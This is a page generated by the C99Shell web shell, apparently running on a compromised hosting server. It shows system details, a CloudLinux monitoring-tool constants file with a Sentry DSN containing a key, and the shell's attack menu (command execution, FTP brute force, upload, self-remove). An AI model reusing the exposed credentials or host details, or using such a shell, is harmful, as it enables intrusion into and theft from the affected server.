!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.3.29 

uname -a: Linux tardis23.nocplanet.net 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024
x86_64
 

 

Safe-mode: OFF (not secure)

/opt/cloudlinux/venv/lib/python3.11/site-packages/wmt/common/   drwxr-xr-x
Free 979.43 GB of 1859.98 GB (52.66%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     const.py (1.06 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/opt/cloudlinux/venv/bin/python3

import os

BASE_DIR = '/etc/wmt'
CONFIG_PATH = os.path.join(BASE_DIR, 'config.json')
WMT_DB = '/var/lve/wmt.db'
LICENSE_EXPIRED_FAREWELL_LETTER_MARKER = '/var/lve/wmt/wmt_farewell_letter.done'
LICENSE_CHECK_PAUSE = 300  # sec
JWT_TOKEN = '/etc/sysconfig/rhn/jwt.token'
WMT_LOCK_FILE = '/var/run/wmt_scanner.lock'
RETENTION_TIME_DAYS = 2
UNKNOWN_RHN_ID = 'unknown'
CLICKHOUSE_WMT_ENDPOINT = 'https://stat-api.cloudlinux.com/api/clos-wsmt'
PING_TIMEOUT_STATUS_CODE = 408
# userland project
SENTRY_DNS = 'https://9e8970e72aa44adb892b3f651e2f0860@cl.sentry.cloudlinux.com/33'
WMT_SCANNER_SERVICE = 'cl_wmt_scanner'
WMT_SCANNER_SERVICE_SOLO = 'cl_wmt_scanner_solo'
WMT_SCANNER_SERVICE_SOLO_FILE = f'{WMT_SCANNER_SERVICE_SOLO}.service'
WMT_TEMPLATES_DIR = '/usr/share/web-monitoring-tool/templates'
ERROR_DOMAINS_PING_RETRY_INTERVAL = 300  # 5min
ERROR_DOMAINS_ALERT_INTERVAL = 6  # hours
PING_CONNECTIONS = 10   # concurrent requests
SERVICE_BIN: str = '/sbin/service'
CHKCONFIG_BIN: str = '/sbin/chkconfig'
SYSTEMCTL_BIN: str = '/usr/bin/systemctl'

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0733 ]--